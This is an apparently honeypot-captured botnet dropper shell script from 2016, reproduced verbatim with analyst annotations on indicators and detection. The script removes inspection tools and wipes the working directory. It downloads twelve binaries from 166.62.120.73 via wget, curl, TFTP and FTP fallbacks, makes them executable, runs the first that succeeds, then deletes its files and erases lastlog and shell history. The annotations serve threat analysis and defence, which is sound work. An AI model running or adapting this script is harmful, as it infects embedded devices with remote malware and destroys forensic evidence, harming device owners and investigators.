recon-scout

Honeypot Payload! Seen on: 2016-06-05 14:55

Jun 5th, 2016
Bash 3.25 KB | None | 0 0
  1. #!/bin/sh
     # analyst: Captured dropper script (honeypot sample), reproduced verbatim so
     # that its command strings and the address 166.62.120.73 stay usable as
     # indicators. Lines marked "analyst:" are review annotations, not part of
     # the sample. Almost every step is written as `cmd || busybox cmd` (or the
     # reverse), so the same action can appear under either process name in
     # command or audit logs.
  2.  
     # analyst: Removes the strings and ps binaries from /usr/bin. Their absence
     # on a device is a host indicator; presumably this is meant to hinder
     # on-box inspection (the sample does not state the intent).
  3. busybox rm -rf /usr/bin/strings || rm -rf /usr/bin/strings
  4. busybox rm -rf /usr/bin/ps || rm -rf /usr/bin/ps
  5.  
  6. # Delete any current files, because not all routers have much storage space
     # analyst: `rm -f *` acts on whatever directory the script is started in
     # (no cd appears in the script); the files matched by * there are lost.
  7. rm -f * || busybox rm -f *
  8.  
  9. # Wget/cURL our binaries
     # analyst: Each line tries six fetch methods in turn for one numbered file:
     # wget, curl -O, busybox wget (all HTTP), two busybox tftp invocations, then
     # busybox ftpget. Nothing in the script verifies what was downloaded.
     # Network indicators: HTTP requests for /1 through /12 on 166.62.120.73,
     # plus TFTP and FTP traffic to the same address. Egress filtering for
     # embedded devices has to cover all three protocols to block this stage.
  10. wget -q http://166.62.120.73/1 || curl -s -O http://166.62.120.73/1 || busybox wget -q http://166.62.120.73/1 || busybox tftp -r 1 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 1 || busybox ftpget 166.62.120.73 1 1
  11. wget -q http://166.62.120.73/2 || curl -s -O http://166.62.120.73/2 || busybox wget -q http://166.62.120.73/2 || busybox tftp -r 2 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 2 || busybox ftpget 166.62.120.73 2 2
  12. wget -q http://166.62.120.73/3 || curl -s -O http://166.62.120.73/3 || busybox wget -q http://166.62.120.73/3 || busybox tftp -r 3 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 3 || busybox ftpget 166.62.120.73 3 3
  13. wget -q http://166.62.120.73/4 || curl -s -O http://166.62.120.73/4 || busybox wget -q http://166.62.120.73/4 || busybox tftp -r 4 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 4 || busybox ftpget 166.62.120.73 4 4
  14. wget -q http://166.62.120.73/5 || curl -s -O http://166.62.120.73/5 || busybox wget -q http://166.62.120.73/5 || busybox tftp -r 5 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 5 || busybox ftpget 166.62.120.73 5 5
  15. wget -q http://166.62.120.73/6 || curl -s -O http://166.62.120.73/6 || busybox wget -q http://166.62.120.73/6 || busybox tftp -r 6 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 6 || busybox ftpget 166.62.120.73 6 6
  16. wget -q http://166.62.120.73/7 || curl -s -O http://166.62.120.73/7 || busybox wget -q http://166.62.120.73/7 || busybox tftp -r 7 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 7 || busybox ftpget 166.62.120.73 7 7
  17. wget -q http://166.62.120.73/8 || curl -s -O http://166.62.120.73/8 || busybox wget -q http://166.62.120.73/8 || busybox tftp -r 8 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 8 || busybox ftpget 166.62.120.73 8 8
  18. wget -q http://166.62.120.73/9 || curl -s -O http://166.62.120.73/9 || busybox wget -q http://166.62.120.73/9 || busybox tftp -r 9 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 9 || busybox ftpget 166.62.120.73 9 9
  19. wget -q http://166.62.120.73/10 || curl -s -O http://166.62.120.73/10 || busybox wget -q http://166.62.120.73/10 || busybox tftp -r 10 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 10 || busybox ftpget 166.62.120.73 10 10
  20. wget -q http://166.62.120.73/11 || curl -s -O http://166.62.120.73/11 || busybox wget -q http://166.62.120.73/11 || busybox tftp -r 11 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 11 || busybox ftpget 166.62.120.73 11 11
     # analyst: As captured, the first tftp fallback on the next line names
     # remote file 11 while the rest of the line refers to 12; this detail can
     # help when comparing against other variants of the script.
  21. wget -q http://166.62.120.73/12 || curl -s -O http://166.62.120.73/12 || busybox wget -q http://166.62.120.73/12 || busybox tftp -r 11 -g 166.62.120.73 || busybox tftp 166.62.120.73 -c get 12 || busybox ftpget 166.62.120.73 12 12
  22.  
  23. # Set file permissions
     # analyst: Marks every file matched by * in the working directory as
     # executable, not only the twelve downloads.
  24. chmod +x * || busybox chmod +x *
  25.  
  26. # Run correct binary for current architecture
     # analyst: The || chain stops at the first file that runs and exits with
     # status 0; a file that cannot be executed on this device (per the comment
     # above, a build for another architecture) fails and the next one is tried.
     # A burst of failed exec attempts on numerically named files is a useful
     # host-side detection signal.
  27. ./1 || ./2 || ./3 || ./4 || ./5 || ./6 || ./7 || ./8 || ./9 || ./10 || ./11 || ./12
  28.  
  29. # Delete our files
     # analyst: Second wipe of the working directory removes the downloaded
     # files, so a process started above may have no backing file left on disk.
     # On Linux, /proc/<pid>/exe and a memory capture taken before any reboot
     # are the places to recover it from.
  30. rm -f * || busybox rm -f *
  31.  
  32. # Clean up
     # analyst: Truncates /var/log/lastlog and /etc/lastlog to zero length,
     # deletes ~/.bash_history and clears the shell's in-memory history.
     # Zero-byte lastlog files and a missing history file are indicators in
     # themselves. Only local files are touched, so logs already forwarded off
     # the device are unaffected by these steps.
  33. >/var/log/lastlog
  34. >/etc/lastlog
  35. rm -f ~/.bash_history || busybox rm -f ~/.bash_history
  36. history -c